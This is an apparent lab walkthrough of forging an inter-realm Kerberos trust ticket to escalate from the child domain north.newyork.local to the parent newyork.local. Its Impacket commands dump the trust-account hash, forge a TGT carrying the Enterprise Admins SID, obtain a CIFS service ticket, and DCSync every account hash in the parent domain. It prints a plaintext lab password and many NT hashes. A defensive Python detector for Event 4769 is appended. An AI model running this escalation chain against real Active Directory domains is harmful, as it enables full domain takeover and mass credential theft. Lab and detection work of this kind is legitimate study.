
Trust ticket - forge inter-realm TGT


Last updated 2 years ago

  • Another way to escalate from the child domain to the parent is to extract the trust key and use it to forge our own trust ticket (a very good explanation, with Mimikatz examples, can be found here: https://adsecurity.org/?p=1588)

  • The trust key is stored in the NTDS as the hash of the trust account, which carries the NetBIOS name of the parent domain (here NEWYORK$), so it can be dumped by targeting that account

secretsdump.py -just-dc-user 'NEWYORK$' \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
 
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:8d20b70ca945f979ff4ac5928e6f7397b43a3737ac9b1ee2579294c584bbe49e
newyork$:aes128-cts-hmac-sha1-96:05c2cc6747982c155cc82ccae92b8475
newyork$:des-cbc-md5:6e647ff89b08b089
[*] Cleaning up... 
  • Now that we have the trust key we can forge the ticket just as we did with the krbtgt hash, but this time we set the SPN to krbtgt/parent_domain so the result is an inter-realm TGT for the parent domain

# -nthash: NT hash of the newyork$ trust account (from the secretsdump output above)
# -domain-sid: SID of north.newyork.local
# -extra-sid: SID of newyork.local with RID 519 appended (Enterprise Admins)
# The comments are kept on separate lines: a "\ #comment" after the backslash
# would end the command early instead of continuing it.
ticketer.py -nthash 59f1453dcd3f2fdc8c52f38693806154 \
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \
 -spn krbtgt/newyork.local trustfakeuser
  • Now we use the forged inter-realm TGT to request a service ticket (ST) in the parent domain

export KRB5CCNAME=/home/jefe/delegation/trustfakeuser.ccache

getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/trustfakeuser@newyork.local -debug
  • And now we can use our service ticket :)

  • connect with smbclient

export KRB5CCNAME=/workspace/trusts/trustfakeuser@newyork.local@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@nyc.newyork.local
  • or even dump secrets

secretsdump.py -k -no-pass -just-dc-ntlm trustfakeuser@nyc.newyork.local
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
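From the defender's side, the tell-tale of this technique is that the parent KDC accepts an inter-realm TGT for a principal (trustfakeuser) that does not exist in the child domain, because it only checks the ticket's signature with the trust key. As an added example, not code from the original page or the lab: a small detector over Event ID 4769 records exported as key=value lines (constructed sample) and a per-realm account inventory as an LDAP export would give it (constructed), flagging service-ticket requests from principals unknown to their own realm.

```python
import re

# Constructed sample events in the shape a newyork.local DC would log a
# Kerberos service ticket request (Event ID 4769) once the forged
# inter-realm TGT is presented; these are not logs captured from the lab.
SAMPLE_EVENTS = [
    "EventID=4769 AccountName=fernando.alonzo@NORTH.NEWYORK.LOCAL "
    "ServiceName=NYC$ ClientAddress=::ffff:192.168.56.22",
    "EventID=4769 AccountName=trustfakeuser@NORTH.NEWYORK.LOCAL "
    "ServiceName=NYC$ ClientAddress=::ffff:192.168.56.1",
    "EventID=4769 AccountName=Administrator@NEWYORK.LOCAL "
    "ServiceName=krbtgt ClientAddress=::ffff:192.168.56.10",
    "EventID=4624 AccountName=vagrant@NEWYORK.LOCAL LogonType=3",
]

# Constructed account inventory per realm (lower-cased sAMAccountNames), as an
# LDAP export of each domain would provide; note each realm holds the other's
# trust account (newyork$ in the child, north$ in the parent).
KNOWN_ACCOUNTS = {
    "NORTH.NEWYORK.LOCAL": {"fernando.alonzo", "north$", "newyork$", "krbtgt"},
    "NEWYORK.LOCAL": {"administrator", "vagrant", "nyc$", "north$", "krbtgt"},
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def find_unknown_principals(lines, known_accounts):
    """Return (account, realm, reason) for every 4769 request whose
    principal is not present in the inventory of its own realm.

    A ticket forged with the trust key can carry any name the attacker
    chose; the parent KDC does not verify that the name exists in the
    child domain, so the directory inventory has to supply that check.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4769" or "@" not in ev.get("AccountName", ""):
            continue
        name, realm = ev["AccountName"].rsplit("@", 1)
        inventory = known_accounts.get(realm.upper())
        if inventory is None:
            findings.append((name, realm.upper(), "realm not in inventory"))
        elif name.lower() not in inventory:
            findings.append((name, realm.upper(), "principal does not exist in its realm"))
    return findings
```

Run the same check over 4624 logon events on member servers to catch the ST being used (smbclient.py, secretsdump.py above) rather than only the KDC side.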
https://adsecurity.org/?p=1588